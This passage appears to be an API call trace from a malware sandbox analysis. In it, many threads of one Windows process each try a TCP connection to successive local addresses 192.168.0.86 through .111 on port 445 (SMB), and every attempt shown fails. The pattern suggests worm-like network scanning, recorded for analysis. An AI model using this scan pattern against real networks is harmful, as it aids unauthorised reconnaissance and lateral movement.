[0164.935] GetCurrentThreadId () returned 0xf20 [0164.935] GetCurrentThreadId () returned 0xf20 [0164.935] longjmp () [0164.935] GetCurrentThreadId () returned 0xf20 [0164.935] CloseHandle (hObject=0x8d4) returned 1 [0164.935] GetCurrentThreadId () returned 0xf20 [0164.935] Sleep (dwMilliseconds=0x0) [0164.971] _endthreadex (_ReturnCode=0x0) Thread: id = 881 os_tid = 0xa7c [0143.662] GetCurrentThreadId () returned 0xa7c [0143.663] GetCurrentThreadId () returned 0xa7c [0143.663] GetCurrentThreadId () returned 0xa7c [0143.663] _errno () returned 0x28fdaf8 [0143.663] wcslen (_String="192.168.0.86") returned 0xc [0143.663] wcstombs (in: _Dest=0x28f03d8, _Source="192.168.0.86", _MaxCount=0xd | out: _Dest="192.168.0.86") returned 0xc [0143.663] htons (hostshort=0x1bd) returned 0xbd01 [0143.663] inet_addr (cp="192.168.0.86") returned 0x5600a8c0 [0143.663] socket (af=2, type=1, protocol=0) returned 0x8f8 [0143.663] connect (s=0x8f8, name=0xec3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.86"), namelen=16) returned -1 [0164.936] GetCurrentThreadId () returned 0xa7c [0164.936] GetCurrentThreadId () returned 0xa7c [0164.936] longjmp () [0164.936] GetCurrentThreadId () returned 0xa7c [0164.936] CloseHandle (hObject=0x8e8) returned 1 [0164.936] GetCurrentThreadId () returned 0xa7c [0164.936] Sleep (dwMilliseconds=0x0) [0164.972] _endthreadex (_ReturnCode=0x0) Thread: id = 882 os_tid = 0xe34 [0143.664] GetCurrentThreadId () returned 0xe34 [0143.664] GetCurrentThreadId () returned 0xe34 [0143.664] GetCurrentThreadId () returned 0xe34 [0143.664] _errno () returned 0x2900618 [0143.664] wcslen (_String="192.168.0.87") returned 0xc [0143.664] wcstombs (in: _Dest=0x28f13e0, _Source="192.168.0.87", _MaxCount=0xd | out: _Dest="192.168.0.87") returned 0xc [0143.664] htons (hostshort=0x1bd) returned 0xbd01 [0143.664] inet_addr (cp="192.168.0.87") returned 0x5700a8c0 [0143.664] socket (af=2, type=1, protocol=0) returned 0x90c [0143.665] connect (s=0x90c, name=0xee7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.87"), namelen=16) returned -1 [0164.936] GetCurrentThreadId () returned 0xe34 [0164.936] GetCurrentThreadId () returned 0xe34 [0164.936] longjmp () [0164.936] GetCurrentThreadId () returned 0xe34 [0164.936] CloseHandle (hObject=0x8fc) returned 1 [0164.936] GetCurrentThreadId () returned 0xe34 [0164.936] Sleep (dwMilliseconds=0x0) [0164.972] _endthreadex (_ReturnCode=0x0) Thread: id = 883 os_tid = 0x954 [0143.666] GetCurrentThreadId () returned 0x954 [0143.666] GetCurrentThreadId () returned 0x954 [0143.666] GetCurrentThreadId () returned 0x954 [0143.666] _errno () returned 0x2900840 [0143.666] wcslen (_String="192.168.0.88") returned 0xc [0143.666] wcstombs (in: _Dest=0x28ee3c8, _Source="192.168.0.88", _MaxCount=0xd | out: _Dest="192.168.0.88") returned 0xc [0143.666] htons (hostshort=0x1bd) returned 0xbd01 [0143.666] inet_addr (cp="192.168.0.88") returned 0x5800a8c0 [0143.666] socket (af=2, type=1, protocol=0) returned 0x920 [0143.666] connect (s=0x920, name=0xf0bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.88"), namelen=16) returned -1 [0164.936] GetCurrentThreadId () returned 0x954 [0164.936] GetCurrentThreadId () returned 0x954 [0164.936] longjmp () [0164.936] GetCurrentThreadId () returned 0x954 [0164.936] CloseHandle (hObject=0x910) returned 1 [0164.936] GetCurrentThreadId () returned 0x954 [0164.936] Sleep (dwMilliseconds=0x0) [0164.973] _endthreadex (_ReturnCode=0x0) Thread: id = 884 os_tid = 0xdf8 [0143.674] GetCurrentThreadId () returned 0xdf8 [0143.674] GetCurrentThreadId () returned 0xdf8 [0143.674] GetCurrentThreadId () returned 0xdf8 [0143.674] _errno () returned 0x2900a68 [0143.674] wcslen (_String="192.168.0.89") returned 0xc [0143.674] wcstombs (in: _Dest=0x28f33f0, _Source="192.168.0.89", _MaxCount=0xd | out: _Dest="192.168.0.89") returned 0xc [0143.674] htons (hostshort=0x1bd) returned 0xbd01 [0143.674] inet_addr (cp="192.168.0.89") returned 0x5900a8c0 [0143.674] socket (af=2, type=1, protocol=0) returned 0x934 [0143.675] connect (s=0x934, name=0xf2ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.89"), namelen=16) returned -1 [0164.936] GetCurrentThreadId () returned 0xdf8 [0164.936] GetCurrentThreadId () returned 0xdf8 [0164.936] longjmp () [0164.936] GetCurrentThreadId () returned 0xdf8 [0164.936] CloseHandle (hObject=0x924) returned 1 [0164.936] GetCurrentThreadId () returned 0xdf8 [0164.936] Sleep (dwMilliseconds=0x0) [0164.973] _endthreadex (_ReturnCode=0x0) Thread: id = 885 os_tid = 0xe18 [0143.677] GetCurrentThreadId () returned 0xe18 [0143.677] GetCurrentThreadId () returned 0xe18 [0143.677] GetCurrentThreadId () returned 0xe18 [0143.677] _errno () returned 0x2900c90 [0143.677] wcslen (_String="192.168.0.90") returned 0xc [0143.677] wcstombs (in: _Dest=0x28f43f8, _Source="192.168.0.90", _MaxCount=0xd | out: _Dest="192.168.0.90") returned 0xc [0143.677] htons (hostshort=0x1bd) returned 0xbd01 [0143.677] inet_addr (cp="192.168.0.90") returned 0x5a00a8c0 [0143.677] socket (af=2, type=1, protocol=0) returned 0x948 [0143.677] connect (s=0x948, name=0xf53fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.90"), namelen=16) returned -1 [0164.936] GetCurrentThreadId () returned 0xe18 [0164.936] GetCurrentThreadId () returned 0xe18 [0164.936] longjmp () [0164.936] GetCurrentThreadId () returned 0xe18 [0164.937] CloseHandle (hObject=0x938) returned 1 [0164.937] GetCurrentThreadId () returned 0xe18 [0164.937] Sleep (dwMilliseconds=0x0) [0164.974] _endthreadex (_ReturnCode=0x0) Thread: id = 886 os_tid = 0x910 [0143.679] GetCurrentThreadId () returned 0x910 [0143.679] GetCurrentThreadId () returned 0x910 [0143.679] GetCurrentThreadId () returned 0x910 [0143.679] _errno () returned 0x2900eb8 [0143.679] wcslen (_String="192.168.0.91") returned 0xc [0143.679] wcstombs (in: _Dest=0x28f5400, _Source="192.168.0.91", _MaxCount=0xd | out: _Dest="192.168.0.91") returned 0xc [0143.679] htons (hostshort=0x1bd) returned 0xbd01 [0143.679] inet_addr (cp="192.168.0.91") returned 0x5b00a8c0 [0143.679] socket (af=2, type=1, protocol=0) returned 0x95c [0143.679] connect (s=0x95c, name=0xf77fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.91"), namelen=16) returned -1 [0164.937] GetCurrentThreadId () returned 0x910 [0164.937] GetCurrentThreadId () returned 0x910 [0164.937] longjmp () [0164.937] GetCurrentThreadId () returned 0x910 [0164.937] CloseHandle (hObject=0x94c) returned 1 [0164.937] GetCurrentThreadId () returned 0x910 [0164.937] Sleep (dwMilliseconds=0x0) [0164.974] _endthreadex (_ReturnCode=0x0) Thread: id = 887 os_tid = 0x52c [0143.680] GetCurrentThreadId () returned 0x52c [0143.680] GetCurrentThreadId () returned 0x52c [0143.680] GetCurrentThreadId () returned 0x52c [0143.680] _errno () returned 0x28fd258 [0143.680] wcslen (_String="192.168.0.92") returned 0xc [0143.680] wcstombs (in: _Dest=0x28f6408, _Source="192.168.0.92", _MaxCount=0xd | out: _Dest="192.168.0.92") returned 0xc [0143.680] htons (hostshort=0x1bd) returned 0xbd01 [0143.680] inet_addr (cp="192.168.0.92") returned 0x5c00a8c0 [0143.680] socket (af=2, type=1, protocol=0) returned 0x970 [0143.681] connect (s=0x970, name=0xf9bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.92"), namelen=16) returned -1 [0164.937] GetCurrentThreadId () returned 0x52c [0164.937] GetCurrentThreadId () returned 0x52c [0164.937] longjmp () [0164.937] GetCurrentThreadId () returned 0x52c [0164.937] CloseHandle (hObject=0x960) returned 1 [0164.937] GetCurrentThreadId () returned 0x52c [0164.937] Sleep (dwMilliseconds=0x0) [0164.975] _endthreadex (_ReturnCode=0x0) Thread: id = 888 os_tid = 0x948 [0143.683] GetCurrentThreadId () returned 0x948 [0143.683] GetCurrentThreadId () returned 0x948 [0143.683] GetCurrentThreadId () returned 0x948 [0143.683] _errno () returned 0x28fd480 [0143.683] wcslen (_String="192.168.0.93") returned 0xc [0143.683] wcstombs (in: _Dest=0x28ef3d0, _Source="192.168.0.93", _MaxCount=0xd | out: _Dest="192.168.0.93") returned 0xc [0143.683] htons (hostshort=0x1bd) returned 0xbd01 [0143.683] inet_addr (cp="192.168.0.93") returned 0x5d00a8c0 [0143.683] socket (af=2, type=1, protocol=0) returned 0x984 [0143.683] connect (s=0x984, name=0xfbffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.93"), namelen=16) returned -1 [0164.937] GetCurrentThreadId () returned 0x948 [0164.937] GetCurrentThreadId () returned 0x948 [0164.937] longjmp () [0164.937] GetCurrentThreadId () returned 0x948 [0164.937] CloseHandle (hObject=0x974) returned 1 [0164.937] GetCurrentThreadId () returned 0x948 [0164.937] Sleep (dwMilliseconds=0x0) [0164.976] _endthreadex (_ReturnCode=0x0) Thread: id = 889 os_tid = 0x9f4 [0143.684] GetCurrentThreadId () returned 0x9f4 [0143.684] GetCurrentThreadId () returned 0x9f4 [0143.684] GetCurrentThreadId () returned 0x9f4 [0143.685] _errno () returned 0x28fd8d0 [0143.685] wcslen (_String="192.168.0.94") returned 0xc [0143.685] wcstombs (in: _Dest=0x28f7410, _Source="192.168.0.94", _MaxCount=0xd | out: _Dest="192.168.0.94") returned 0xc [0143.685] htons (hostshort=0x1bd) returned 0xbd01 [0143.685] inet_addr (cp="192.168.0.94") returned 0x5e00a8c0 [0143.685] socket (af=2, type=1, protocol=0) returned 0x998 [0143.685] connect (s=0x998, name=0xfe3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.94"), namelen=16) returned -1 [0164.937] GetCurrentThreadId () returned 0x9f4 [0164.937] GetCurrentThreadId () returned 0x9f4 [0164.937] longjmp () [0164.937] GetCurrentThreadId () returned 0x9f4 [0164.937] CloseHandle (hObject=0x988) returned 1 [0164.937] GetCurrentThreadId () returned 0x9f4 [0164.937] Sleep (dwMilliseconds=0x0) [0164.976] _endthreadex (_ReturnCode=0x0) Thread: id = 890 os_tid = 0x560 [0143.686] GetCurrentThreadId () returned 0x560 [0143.686] GetCurrentThreadId () returned 0x560 [0143.686] GetCurrentThreadId () returned 0x560 [0143.686] _errno () returned 0x28fdd20 [0143.686] wcslen (_String="192.168.0.95") returned 0xc [0143.686] wcstombs (in: _Dest=0x28f23e8, _Source="192.168.0.95", _MaxCount=0xd | out: _Dest="192.168.0.95") returned 0xc [0143.686] htons (hostshort=0x1bd) returned 0xbd01 [0143.686] inet_addr (cp="192.168.0.95") returned 0x5f00a8c0 [0143.686] socket (af=2, type=1, protocol=0) returned 0x9ac [0143.686] connect (s=0x9ac, name=0x1007fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.95"), namelen=16) returned -1 [0164.938] GetCurrentThreadId () returned 0x560 [0164.938] GetCurrentThreadId () returned 0x560 [0164.938] longjmp () [0164.938] GetCurrentThreadId () returned 0x560 [0164.938] CloseHandle (hObject=0x99c) returned 1 [0164.938] GetCurrentThreadId () returned 0x560 [0164.938] Sleep (dwMilliseconds=0x0) [0164.977] _endthreadex (_ReturnCode=0x0) Thread: id = 891 os_tid = 0x930 [0143.688] GetCurrentThreadId () returned 0x930 [0143.688] GetCurrentThreadId () returned 0x930 [0143.688] GetCurrentThreadId () returned 0x930 [0143.688] _errno () returned 0x28fd6a8 [0143.690] wcslen (_String="192.168.0.96") returned 0xc [0143.690] wcstombs (in: _Dest=0x29025e8, _Source="192.168.0.96", _MaxCount=0xd | out: _Dest="192.168.0.96") returned 0xc [0143.690] htons (hostshort=0x1bd) returned 0xbd01 [0143.690] inet_addr (cp="192.168.0.96") returned 0x6000a8c0 [0143.690] socket (af=2, type=1, protocol=0) returned 0x9c0 [0143.690] connect (s=0x9c0, name=0x102bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.96"), namelen=16) returned -1 [0164.938] GetCurrentThreadId () returned 0x930 [0164.938] GetCurrentThreadId () returned 0x930 [0164.938] longjmp () [0164.938] GetCurrentThreadId () returned 0x930 [0164.938] CloseHandle (hObject=0x9b0) returned 1 [0164.938] GetCurrentThreadId () returned 0x930 [0164.938] Sleep (dwMilliseconds=0x0) [0164.977] _endthreadex (_ReturnCode=0x0) Thread: id = 892 os_tid = 0x9a0 [0143.691] GetCurrentThreadId () returned 0x9a0 [0143.691] GetCurrentThreadId () returned 0x9a0 [0143.691] GetCurrentThreadId () returned 0x9a0 [0143.691] _errno () returned 0x28fe170 [0143.691] wcslen (_String="192.168.0.97") returned 0xc [0143.691] wcstombs (in: _Dest=0x29035f0, _Source="192.168.0.97", _MaxCount=0xd | out: _Dest="192.168.0.97") returned 0xc [0143.691] htons (hostshort=0x1bd) returned 0xbd01 [0143.691] inet_addr (cp="192.168.0.97") returned 0x6100a8c0 [0143.691] socket (af=2, type=1, protocol=0) returned 0x9d4 [0143.692] connect (s=0x9d4, name=0x104ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.97"), namelen=16) returned -1 [0164.938] GetCurrentThreadId () returned 0x9a0 [0164.938] GetCurrentThreadId () returned 0x9a0 [0164.938] longjmp () [0164.938] GetCurrentThreadId () returned 0x9a0 [0164.938] CloseHandle (hObject=0x9c4) returned 1 [0164.938] GetCurrentThreadId () returned 0x9a0 [0164.938] Sleep (dwMilliseconds=0x0) [0164.978] _endthreadex (_ReturnCode=0x0) Thread: id = 893 os_tid = 0xf28 [0143.694] GetCurrentThreadId () returned 0xf28 [0143.694] GetCurrentThreadId () returned 0xf28 [0143.694] GetCurrentThreadId () returned 0xf28 [0143.694] _errno () returned 0x28ffd78 [0143.694] wcslen (_String="192.168.0.98") returned 0xc [0143.694] wcstombs (in: _Dest=0x29045f8, _Source="192.168.0.98", _MaxCount=0xd | out: _Dest="192.168.0.98") returned 0xc [0143.694] htons (hostshort=0x1bd) returned 0xbd01 [0143.694] inet_addr (cp="192.168.0.98") returned 0x6200a8c0 [0143.694] socket (af=2, type=1, protocol=0) returned 0x9e8 [0143.694] connect (s=0x9e8, name=0x1073fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.98"), namelen=16) returned -1 [0164.938] GetCurrentThreadId () returned 0xf28 [0164.938] GetCurrentThreadId () returned 0xf28 [0164.938] longjmp () [0164.938] GetCurrentThreadId () returned 0xf28 [0164.938] CloseHandle (hObject=0x9d8) returned 1 [0164.938] GetCurrentThreadId () returned 0xf28 [0164.938] Sleep (dwMilliseconds=0x0) [0164.978] _endthreadex (_ReturnCode=0x0) Thread: id = 894 os_tid = 0x928 [0143.696] GetCurrentThreadId () returned 0x928 [0143.696] GetCurrentThreadId () returned 0x928 [0143.696] GetCurrentThreadId () returned 0x928 [0143.696] _errno () returned 0x28fffa0 [0143.696] wcslen (_String="192.168.0.99") returned 0xc [0143.696] wcstombs (in: _Dest=0x2905600, _Source="192.168.0.99", _MaxCount=0xd | out: _Dest="192.168.0.99") returned 0xc [0143.696] htons (hostshort=0x1bd) returned 0xbd01 [0143.696] inet_addr (cp="192.168.0.99") returned 0x6300a8c0 [0143.696] socket (af=2, type=1, protocol=0) returned 0x9fc [0143.697] connect (s=0x9fc, name=0x1097fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.99"), namelen=16) returned -1 [0164.938] GetCurrentThreadId () returned 0x928 [0164.938] GetCurrentThreadId () returned 0x928 [0164.938] longjmp () [0164.938] GetCurrentThreadId () returned 0x928 [0164.939] CloseHandle (hObject=0x9ec) returned 1 [0164.939] GetCurrentThreadId () returned 0x928 [0164.939] Sleep (dwMilliseconds=0x0) [0164.979] _endthreadex (_ReturnCode=0x0) Thread: id = 895 os_tid = 0x854 [0143.698] GetCurrentThreadId () returned 0x854 [0143.698] GetCurrentThreadId () returned 0x854 [0143.698] GetCurrentThreadId () returned 0x854 [0143.698] _errno () returned 0x29001c8 [0143.698] wcslen (_String="192.168.0.100") returned 0xd [0143.698] wcstombs (in: _Dest=0x2906608, _Source="192.168.0.100", _MaxCount=0xe | out: _Dest="192.168.0.100") returned 0xd [0143.698] htons (hostshort=0x1bd) returned 0xbd01 [0143.698] inet_addr (cp="192.168.0.100") returned 0x6400a8c0 [0143.698] socket (af=2, type=1, protocol=0) returned 0xa10 [0143.699] connect (s=0xa10, name=0x10bbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.100"), namelen=16) returned -1 [0164.939] GetCurrentThreadId () returned 0x854 [0164.939] GetCurrentThreadId () returned 0x854 [0164.939] longjmp () [0164.939] GetCurrentThreadId () returned 0x854 [0164.939] CloseHandle (hObject=0xa00) returned 1 [0164.939] GetCurrentThreadId () returned 0x854 [0164.939] Sleep (dwMilliseconds=0x0) [0164.979] _endthreadex (_ReturnCode=0x0) Thread: id = 896 os_tid = 0xa54 [0143.700] GetCurrentThreadId () returned 0xa54 [0143.700] GetCurrentThreadId () returned 0xa54 [0143.700] GetCurrentThreadId () returned 0xa54 [0143.700] _errno () returned 0x29003f0 [0143.700] wcslen (_String="192.168.0.101") returned 0xd [0143.700] wcstombs (in: _Dest=0x2907610, _Source="192.168.0.101", _MaxCount=0xe | out: _Dest="192.168.0.101") returned 0xd [0143.700] htons (hostshort=0x1bd) returned 0xbd01 [0143.700] inet_addr (cp="192.168.0.101") returned 0x6500a8c0 [0143.700] socket (af=2, type=1, protocol=0) returned 0xa24 [0143.700] connect (s=0xa24, name=0x10dffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.101"), namelen=16) returned -1 [0164.939] GetCurrentThreadId () returned 0xa54 [0164.939] GetCurrentThreadId () returned 0xa54 [0164.939] longjmp () [0164.939] GetCurrentThreadId () returned 0xa54 [0164.939] CloseHandle (hObject=0xa14) returned 1 [0164.939] GetCurrentThreadId () returned 0xa54 [0164.939] Sleep (dwMilliseconds=0x0) [0164.980] _endthreadex (_ReturnCode=0x0) Thread: id = 897 os_tid = 0x8c8 [0143.702] GetCurrentThreadId () returned 0x8c8 [0143.702] GetCurrentThreadId () returned 0x8c8 [0143.702] GetCurrentThreadId () returned 0x8c8 [0143.702] _errno () returned 0x28fe7e8 [0143.702] wcslen (_String="192.168.0.102") returned 0xd [0143.702] wcstombs (in: _Dest=0x2908618, _Source="192.168.0.102", _MaxCount=0xe | out: _Dest="192.168.0.102") returned 0xd [0143.702] htons (hostshort=0x1bd) returned 0xbd01 [0143.702] inet_addr (cp="192.168.0.102") returned 0x6600a8c0 [0143.702] socket (af=2, type=1, protocol=0) returned 0xa38 [0143.702] connect (s=0xa38, name=0x1103fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.102"), namelen=16) returned -1 [0164.939] GetCurrentThreadId () returned 0x8c8 [0164.939] GetCurrentThreadId () returned 0x8c8 [0164.939] longjmp () [0164.939] GetCurrentThreadId () returned 0x8c8 [0164.939] CloseHandle (hObject=0xa28) returned 1 [0164.939] GetCurrentThreadId () returned 0x8c8 [0164.939] Sleep (dwMilliseconds=0x0) [0164.981] _endthreadex (_ReturnCode=0x0) Thread: id = 898 os_tid = 0xf30 [0143.703] GetCurrentThreadId () returned 0xf30 [0143.703] GetCurrentThreadId () returned 0xf30 [0143.703] GetCurrentThreadId () returned 0xf30 [0143.703] _errno () returned 0x28fe398 [0143.703] wcslen (_String="192.168.0.103") returned 0xd [0143.703] wcstombs (in: _Dest=0x29015e0, _Source="192.168.0.103", _MaxCount=0xe | out: _Dest="192.168.0.103") returned 0xd [0143.703] htons (hostshort=0x1bd) returned 0xbd01 [0143.703] inet_addr (cp="192.168.0.103") returned 0x6700a8c0 [0143.703] socket (af=2, type=1, protocol=0) returned 0xa4c [0143.704] connect (s=0xa4c, name=0x1127fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.103"), namelen=16) returned -1 [0164.939] GetCurrentThreadId () returned 0xf30 [0164.939] GetCurrentThreadId () returned 0xf30 [0164.939] longjmp () [0164.939] GetCurrentThreadId () returned 0xf30 [0164.939] CloseHandle (hObject=0xa3c) returned 1 [0164.939] GetCurrentThreadId () returned 0xf30 [0164.939] Sleep (dwMilliseconds=0x0) [0164.981] _endthreadex (_ReturnCode=0x0) Thread: id = 899 os_tid = 0x82c [0143.705] GetCurrentThreadId () returned 0x82c [0143.705] GetCurrentThreadId () returned 0x82c [0143.705] GetCurrentThreadId () returned 0x82c [0143.705] _errno () returned 0x28fea10 [0143.733] wcslen (_String="192.168.0.104") returned 0xd [0143.733] wcstombs (in: _Dest=0x290b630, _Source="192.168.0.104", _MaxCount=0xe | out: _Dest="192.168.0.104") returned 0xd [0143.733] htons (hostshort=0x1bd) returned 0xbd01 [0143.733] inet_addr (cp="192.168.0.104") returned 0x6800a8c0 [0143.733] socket (af=2, type=1, protocol=0) returned 0xa60 [0143.734] connect (s=0xa60, name=0x114bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.104"), namelen=16) returned -1 [0164.940] GetCurrentThreadId () returned 0x82c [0164.940] GetCurrentThreadId () returned 0x82c [0164.940] longjmp () [0164.940] GetCurrentThreadId () returned 0x82c [0164.940] CloseHandle (hObject=0xa50) returned 1 [0164.940] GetCurrentThreadId () returned 0x82c [0164.940] Sleep (dwMilliseconds=0x0) [0164.982] _endthreadex (_ReturnCode=0x0) Thread: id = 900 os_tid = 0xe68 [0143.739] GetCurrentThreadId () returned 0xe68 [0143.739] GetCurrentThreadId () returned 0xe68 [0143.739] GetCurrentThreadId () returned 0xe68 [0143.739] _errno () returned 0x28fe5c0 [0143.739] wcslen (_String="192.168.0.105") returned 0xd [0143.739] wcstombs (in: _Dest=0x290c638, _Source="192.168.0.105", _MaxCount=0xe | out: _Dest="192.168.0.105") returned 0xd [0143.739] htons (hostshort=0x1bd) returned 0xbd01 [0143.739] inet_addr (cp="192.168.0.105") returned 0x6900a8c0 [0143.739] socket (af=2, type=1, protocol=0) returned 0xa74 [0143.739] connect (s=0xa74, name=0x116ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.105"), namelen=16) returned -1 [0164.940] GetCurrentThreadId () returned 0xe68 [0164.940] GetCurrentThreadId () returned 0xe68 [0164.940] longjmp () [0164.940] GetCurrentThreadId () returned 0xe68 [0164.940] CloseHandle (hObject=0xa64) returned 1 [0164.940] GetCurrentThreadId () returned 0xe68 [0164.940] Sleep (dwMilliseconds=0x0) [0164.982] _endthreadex (_ReturnCode=0x0) Thread: id = 901 os_tid = 0xf58 [0143.742] GetCurrentThreadId () returned 0xf58 [0143.742] GetCurrentThreadId () returned 0xf58 [0143.742] GetCurrentThreadId () returned 0xf58 [0143.742] _errno () returned 0x28ff088 [0143.742] wcslen (_String="192.168.0.106") returned 0xd [0143.742] wcstombs (in: _Dest=0x290d640, _Source="192.168.0.106", _MaxCount=0xe | out: _Dest="192.168.0.106") returned 0xd [0143.742] htons (hostshort=0x1bd) returned 0xbd01 [0143.742] inet_addr (cp="192.168.0.106") returned 0x6a00a8c0 [0143.742] socket (af=2, type=1, protocol=0) returned 0xa88 [0143.742] connect (s=0xa88, name=0x1193fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.106"), namelen=16) returned -1 [0164.940] GetCurrentThreadId () returned 0xf58 [0164.940] GetCurrentThreadId () returned 0xf58 [0164.940] longjmp () [0164.940] GetCurrentThreadId () returned 0xf58 [0164.940] CloseHandle (hObject=0xa78) returned 1 [0164.940] GetCurrentThreadId () returned 0xf58 [0164.940] Sleep (dwMilliseconds=0x0) [0164.983] _endthreadex (_ReturnCode=0x0) Thread: id = 902 os_tid = 0xf7c [0143.743] GetCurrentThreadId () returned 0xf7c [0143.743] GetCurrentThreadId () returned 0xf7c [0143.743] GetCurrentThreadId () returned 0xf7c [0143.743] _errno () returned 0x28fec38 [0143.743] wcslen (_String="192.168.0.107") returned 0xd [0143.743] wcstombs (in: _Dest=0x290e648, _Source="192.168.0.107", _MaxCount=0xe | out: _Dest="192.168.0.107") returned 0xd [0143.744] htons (hostshort=0x1bd) returned 0xbd01 [0143.744] inet_addr (cp="192.168.0.107") returned 0x6b00a8c0 [0143.744] socket (af=2, type=1, protocol=0) returned 0xa9c [0143.744] connect (s=0xa9c, name=0x11b7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.107"), namelen=16) returned -1 [0164.940] GetCurrentThreadId () returned 0xf7c [0164.940] GetCurrentThreadId () returned 0xf7c [0164.940] longjmp () [0164.940] GetCurrentThreadId () returned 0xf7c [0164.940] CloseHandle (hObject=0xa8c) returned 1 [0164.940] GetCurrentThreadId () returned 0xf7c [0164.940] Sleep (dwMilliseconds=0x0) [0164.985] _endthreadex (_ReturnCode=0x0) Thread: id = 903 os_tid = 0xaa0 [0143.745] GetCurrentThreadId () returned 0xaa0 [0143.745] GetCurrentThreadId () returned 0xaa0 [0143.745] GetCurrentThreadId () returned 0xaa0 [0143.745] _errno () returned 0x28ff2b0 [0143.745] wcslen (_String="192.168.0.108") returned 0xd [0143.745] wcstombs (in: _Dest=0x290f650, _Source="192.168.0.108", _MaxCount=0xe | out: _Dest="192.168.0.108") returned 0xd [0143.745] htons (hostshort=0x1bd) returned 0xbd01 [0143.745] inet_addr (cp="192.168.0.108") returned 0x6c00a8c0 [0143.745] socket (af=2, type=1, protocol=0) returned 0xab0 [0143.745] connect (s=0xab0, name=0x11dbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.108"), namelen=16) returned -1 [0164.940] GetCurrentThreadId () returned 0xaa0 [0164.940] GetCurrentThreadId () returned 0xaa0 [0164.941] longjmp () [0164.941] GetCurrentThreadId () returned 0xaa0 [0164.941] CloseHandle (hObject=0xaa0) returned 1 [0164.941] GetCurrentThreadId () returned 0xaa0 [0164.941] Sleep (dwMilliseconds=0x0) [0164.986] _endthreadex (_ReturnCode=0x0) Thread: id = 904 os_tid = 0xf70 [0143.746] GetCurrentThreadId () returned 0xf70 [0143.747] GetCurrentThreadId () returned 0xf70 [0143.747] GetCurrentThreadId () returned 0xf70 [0143.747] _errno () returned 0x28fee60 [0143.747] wcslen (_String="192.168.0.109") returned 0xd [0143.747] wcstombs (in: _Dest=0x2910658, _Source="192.168.0.109", _MaxCount=0xe | out: _Dest="192.168.0.109") returned 0xd [0143.747] htons (hostshort=0x1bd) returned 0xbd01 [0143.747] inet_addr (cp="192.168.0.109") returned 0x6d00a8c0 [0143.747] socket (af=2, type=1, protocol=0) returned 0xac4 [0143.747] connect (s=0xac4, name=0x11fffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.109"), namelen=16) returned -1 [0164.941] GetCurrentThreadId () returned 0xf70 [0164.941] GetCurrentThreadId () returned 0xf70 [0164.941] longjmp () [0164.941] GetCurrentThreadId () returned 0xf70 [0164.941] CloseHandle (hObject=0xab4) returned 1 [0164.941] GetCurrentThreadId () returned 0xf70 [0164.941] Sleep (dwMilliseconds=0x0) [0164.986] _endthreadex (_ReturnCode=0x0) Thread: id = 905 os_tid = 0xf80 [0143.749] GetCurrentThreadId () returned 0xf80 [0143.749] GetCurrentThreadId () returned 0xf80 [0143.749] GetCurrentThreadId () returned 0xf80 [0143.749] _errno () returned 0x28ff700 [0143.749] wcslen (_String="192.168.0.110") returned 0xd [0143.749] wcstombs (in: _Dest=0x2909620, _Source="192.168.0.110", _MaxCount=0xe | out: _Dest="192.168.0.110") returned 0xd [0143.749] htons (hostshort=0x1bd) returned 0xbd01 [0143.749] inet_addr (cp="192.168.0.110") returned 0x6e00a8c0 [0143.749] socket (af=2, type=1, protocol=0) returned 0xad8 [0143.749] connect (s=0xad8, name=0x1223fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.110"), namelen=16) returned -1 [0164.941] GetCurrentThreadId () returned 0xf80 [0164.941] GetCurrentThreadId () returned 0xf80 [0164.941] longjmp () [0164.941] GetCurrentThreadId () returned 0xf80 [0164.941] CloseHandle (hObject=0xac8) returned 1 [0164.941] GetCurrentThreadId () returned 0xf80 [0164.941] Sleep (dwMilliseconds=0x0) [0164.987] _endthreadex (_ReturnCode=0x0) Thread: id = 906 os_tid = 0xa58 [0143.750] GetCurrentThreadId () returned 0xa58 [0143.750] GetCurrentThreadId () returned 0xa58 [0143.750] GetCurrentThreadId () returned 0xa58 [0143.750] _errno () returned 0x28ff928 [0143.751] wcslen (_String="192.168.0.111") returned 0xd [0143.751] wcstombs (in: _Dest=0x2911660, _Source="192.168.0.111", _MaxCount=0xe | out: _Dest="192.168.0.111") returned 0xd [0143.751] htons (hostshort=0x1bd) returned 0xbd01 [0143.751] inet_addr (cp="192.168.0.111") returned 0x6f00a8c0 [0143.751] socket (af=2, type=1, protocol=0) returned 0xaec [0143.751] connect (s=0xaec, name=0x1247fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.111"), namelen=16) returned -1 [0164.941] GetCurrentThreadId () returned 0xa58 [0164.941] GetCurrentThreadId () returned 0xa58 [0164.941] longjmp () [0164.941] GetCurrentThreadId () returned 0xa58 [0164.941] CloseHandle (hObject=0xadc) returned 1 [0164.941] GetCurrentThreadId () returned 0xa58 [0164.941] Sleep (dwMilliseconds=0x0) [0164.987] _endthreadex (_ReturnCode=0x0) Thread: id = 907 os_tid = 0xa94 [0143.752] GetCurrentThreadId () returned 0xa94 [0143.752] GetCurrentThreadId () returned 0xa94 [0143.752] GetCurrentThreadId () returned 0xa94 